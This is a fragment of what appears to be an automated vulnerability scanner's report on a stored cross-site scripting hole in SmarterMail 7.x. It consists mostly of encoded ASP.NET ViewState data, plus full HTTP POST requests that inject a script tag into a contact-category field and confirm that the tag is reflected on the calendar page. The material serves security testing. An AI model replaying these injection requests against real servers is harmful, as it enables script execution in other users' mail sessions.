uVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFEUVuYWJsZU11bHRpU2VsZWN0aAUPUmVuZGVySW52aXNpYmxlZwUOUm93SGVhZGVySW1hZ2UFKS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQuZ2lmBRJOYXZpZ2F0aW9uTmV4dFRleHRlBQRNaW5EBgBAVyBTBVEIBQNFUlNoBQ1TZWxlY3RlZERhdGVzDwWPAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkRhdGVUaW1lQ29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUSTmF2aWdhdGlvblByZXZUZXh0ZQURVmlld1NlbGVjdG9ySW1hZ2UFKi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQyLmdpZgUETWF4RAYAANuZej8xCQ8WCB8MBQxTbWFydGVyVG9vbHMfC2gfCmgfFWhkZBYEHwgFC3JjTWFpblRhYmxlHwkCAhYEHwgFDHJjT3RoZXJNb250aB8JAgJkFgQfCAUKcmNTZWxlY3RlZB8JAgJkFgQfCAUKcmNEaXNhYmxlZB8JAgIWBB8IBQxyY091dE9mUmFuZ2UfCQICFgQfCAUJcmNXZWVrZW5kHwkCAhYEHwgFB3JjSG92ZXIfCQICFgQfCAU2UmFkQ2FsZW5kYXJNb250aFZpZXcgUmFkQ2FsZW5kYXJNb250aFZpZXdfU21hcnRlclRvb2xzHwkCAhYEHwgFCXJjVmlld1NlbB8JAgJkAgMPDxYEHxcFLS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L1VwY29taW5nLmdpZh8YBS0vQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9VcGNvbWluZy5naWYWAh8ZBUpyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZml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0JHRpbWVWaWV3BSNjdGwwMCRNUEgkRW5kRGF0ZVBpY2tlcl9TZXR0aW5nVGV4dAUsY3RsMDAkTVBIJEVuZERhdGVQaWNrZXJfU2V0dGluZ1RleHQkY2FsZW5kYXIFLGN0bDAwJE1QSCRFbmREYXRlUGlja2VyX1NldHRpbmdUZXh0JGNhbGVuZGFyBSxjdGwwMCRNUEgkRW5kRGF0ZVBpY2tlcl9TZXR0aW5nVGV4dCR0aW1lVmlldwUhY3RsMDAkTVBIJGNoa0NhdGVnb3J5XzU4MDc5NjAyOF8wBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiMg8y3AsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BDYXRlZ29yaWVzAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAANQ2F0ZWdvcmllc1RhYgtkBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiMw8y3gsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAADEBEZXNjcmlwdGlvbgH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAADkRlc2NyaXB0aW9uVGFiC2QFF2N0bDAwJFRQSCRUYWJTdHJpcCRUYWIxDzLWCwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRv..
- /Main/frmCalendar.aspx

/Main/frmCalendar.aspx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/Main/frmCalendar.aspx

Injection URL

http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupContactCategories.aspx

Injection Request

POST /Main/frmPopupContactCategories.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupContactCategories.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 443
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__EVENTTARGET=ctl00%24BrPH%24OKImageButton&__EVENTARGUMENT=1&__VIEWSTATE=%2fwEPDwUKLTE1MzIwNjc1OQ8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWBgIFDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwJoFgICAQ8WAh4EVGV4dGVkAgsPZBYCAgMPZBYCZg9kFgJmDw8WBB4IQ3NzQ2xhc3MFDkluZGVudCBTZXR0aW5nHgRfIVNCAgJkFgICAw8PFgIfA2VkZGTYbBeYmpPfD5OfkuIOw4oB9USDxQ%3d%3d&ctl00%24MPH%24txtCategories_SettingText=%3cscript%3ens(0x005CD1)%3c%2fscript%3e

Identification Request

POST /Main/frmCalendar.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmCalendar.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 14562
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__EVENTTARGET=ctl00%24MPH%24rightClickMenu&__EVENTARGUMENT=ctl00_MPH_rightClickMenu_menuDelete&__VIEWSTATE=%2fwEPDwUKMTE0MTU5OTM3NQ8WCB4IX19fVGl0bGUFC015IENhbGVuZGFyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeB19fc3RhdGUyjgUAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAwCAAAAT1NNV2ViLCBWZXJzaW9uPTcuMi4zOTI1LjI0NTIxLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWMzOWQzMzQ4NjU2ZTUxNmMMAwAAAFlSZW1vdGVJbnRlcmZhY2UsIFZlcnNpb249Ny4yLjM5MjUuMjQ1MTIsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YzM5ZDMzNDg2NTZlNTE2YwUBAAAAKlNNV2ViLkhlbHBlckNsYXNzZXMuQ2FsZW5kYXIuQ2FsZW5kYXJTdGF0ZQoAAAAER3VpZAxTZWFyY2hTdHJpbmcIQ2F0ZWdvcnkNU2hvd1JlY3VycmluZwpTaG93QWxsRGF5BE1vZGUORm9jdXNlZERhdGVVVEMRUmVzb3VyY2VPd25lclVzZXISUmVzb3VyY2VPd25lckVtYWlsA1NDRAEBAQAABAABAQQBASlTTVdlYi5IZWxwZXJDbGFzc2VzLkNhbGVuZGFyLkNhbGVuZGFyTW9kZQIAAAANPFNtYXJ0ZXJUb29scy5TbWFydGVyTWFpbC5SZW1vdGluZy5TaGFyaW5nLlNoYXJlQ29ubmVjdG9yRGF0YQMAAAACAAAABgQAAAAgNjhiNTM3MmIyMTAyNDZmNTgyZTA1ZmVjMmYxY2Y5NjYGBQAAAAAJBQAAAAEBBfr%2f%2f%2f8pU01XZWIuSGVscGVyQ2xhc3Nlcy5DYWxlbmRhci5DYWxlbmRhck1vZGUBAAAAB3ZhbHVlX18ACAIAAAAAAAAAYHZvp6wwzUgGBwAAAAVkdW1teQYIAAAAEWR1bW15QGhveXRsbGMuY29tCgsWAmYPZBYCAgEPZBYMAgMPZBYEAgEPZBYCAgEPZBYCZg9kFgICAQ9kFgQCAQ9kFgRmDxYCHgdWaXNpYmxlaGQCAQ8WAh8EaGQCAg9kFgJmD2QWAmYPFgIfBGhkAgMPZBYCAgEPZBYCAgEPDxYCHgRUZXh0BQlTZWFyY2guLi5kZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx8EaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh8FZWQCCQ9kFgICAw9kFgJmD2QWCAIBD2QWAmYPZBYIZg9kFgICAQ8PFgIeCEltYWdlVXJsBSsvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9NaXNjL05hdkxlZnQucG5nZGQCAQ9kFgICAQ8PFgIfBwUsL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvTWlzYy9OYXZSaWdodC5wbmdkZAICD2QWAgIBDw8WAh8FBRpTYXR1cmRheSwgT2N0b2JlciAwMiwgMjAxMGRkAgMPZBYCAgEPDxYCHwcFMi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L0NhbGVuZGFyTW9udGguZ2lmZGQCAw8WAh8EaGQCBw8PFgIfBGdkFgQCAQ8WAh8EaGQCAw8WAh4LXyFJdGVtQ291bnQCChYUAgEPZBYCZg8VBxNDYWxlbmRhckJ1c2luZXNzRGF5SS9NYWluL0NhbGVuZGFyL2ZybUV2ZW50LmFzcHg%2fZHQ9MTAvMDIvMjAxMCZ0aW1lPTgmdXNlcj1kdW1teSZtYXBwZWQ9ZmFsc2UEOCBBTQE4ATgRUmlnaHRDbGlja2FibGVOZXcDQWx0ZAICD2QWAmYPFQcTQ2FsZW5kYXJCdXNpbmVzc0RheUkvTWFpbi9DYWxlbmRhci9mcm1FdmVudC5hc3B4P2R0PTEwLzAyLzIwMTAmdGltZT05JnVzZXI9ZHVtbXkmbWFwcGVkPWZhbHNlBDkgQU0BOQE5EVJpZ2h0Q2xpY2thYmxlTmV3AGQCAw9kFgJmDxUHE0NhbGVuZGFyQnVzaW5lc3NEYXlKL01haW4vQ2FsZW5kYXIvZnJtRXZlbnQuYXNweD9kdD0xMC8wMi8yMDEwJnRpbWU9MTAmdXNlcj1kdW1teSZtYXBwZWQ9ZmFsc2UFMTAgQU0CMTACMTARUmlnaHRDbGlja2FibGVOZXcDQWx0ZAIED2QWAmYPFQcTQ2FsZW5kYXJCdXNpbmVzc0RheUovTWFpbi9DYWxlbmRhci9mcm1FdmVudC5hc3B4P2R0PTEwLzAyLzIwMTAmdGltZT0xMSZ1c2VyPWR1bW15Jm1hcHBlZD1mYWxzZQUxMSBBTQIxMQIxMRFSaWdodENsaWNrYWJsZU5ldwBkAgUPZBYCZg8VBxNDYWxlbmRhckJ1c2luZXNzRGF5Si9NYWluL0NhbGVuZGFyL2ZybUV2ZW50LmFzcHg%2fZHQ9MTAvMDIvMjAxMCZ0aW1lPTEyJnVzZXI9ZHVtbXkmbWFwcGVkPWZhbHNlBTEyIFBNAjEyAjEyEVJpZ2h0Q2xpY2thYmxlTmV3A0FsdGQCBg9kFgJmDxUHE0NhbGVuZGFyQnVzaW5lc3NEYXlKL01haW4vQ2FsZW5kYXIvZnJtRXZlbnQuYXNweD9kdD0xMC8wMi8yMDEwJnRpbWU9MTMmdXNlcj1kdW1teSZtYXBwZWQ9ZmFsc2UEMSBQTQIxMwIxMxFSaWdodENsaWNrYWJsZU5ldwBkAgcPZBYCZg8VBxNDYWxlbmRhckJ1c2luZXNzRGF5Si9NYWluL0NhbGVuZGFyL2ZybUV2ZW50LmFzcHg%2fZHQ9MTAvMDIvMjAxMCZ0aW1lPTE0JnVzZXI9ZHVtbXkmbWFwcGVkPWZhbHNlBDIgUE0CMTQCMTQRUmlnaHRDbGlja2FibGVOZXcDQWx0ZAIID2QWAmYPFQcTQ2FsZW5kYXJCdXNpbmVzc0RheUovTWFpbi9DYWxlbmRhci9mcm1FdmVudC5hc3B4P2R0PTEwLzAyLzIwMTAmdGltZT0xNSZ1c2VyPWR1bW15Jm1hcHBlZD1mYWxzZQQzIFBNAjE1AjE1EVJpZ2h0Q2xpY2thYmxlTmV3AGQCCQ9kFgJmDxUHE0NhbGVuZGFyQnVzaW5lc3NEYXlKL01haW4vQ2FsZW5kYXIvZnJtRXZlbnQuYXNweD9kdD0xMC8wMi8yMDEwJnRpbWU9MTYmdXNlcj1kdW1teSZtYXBwZWQ9ZmFsc2UENCBQTQIxNgIxNhFSaWdodENsaWN